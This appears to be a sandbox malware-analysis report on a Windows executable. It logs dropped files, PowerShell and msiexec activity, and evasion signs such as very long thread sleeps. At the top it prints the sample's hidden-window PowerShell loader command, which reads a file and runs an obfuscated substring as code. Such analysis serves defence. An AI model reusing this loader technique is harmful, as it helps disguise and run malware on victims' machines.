Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Baarebukets=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\prelusory.Tuk206';$Figura=$Baarebukets.SubString(29776,3);.$Figura($Baarebukets) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_047FA5AF push eax; iretd

1_2_047FA639

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	File created: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596116	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7240			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2472			Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7588	Thread sleep count: 8730 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7588	Thread sleep count: 1097 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep count: 31 > 30	Jump to behavior
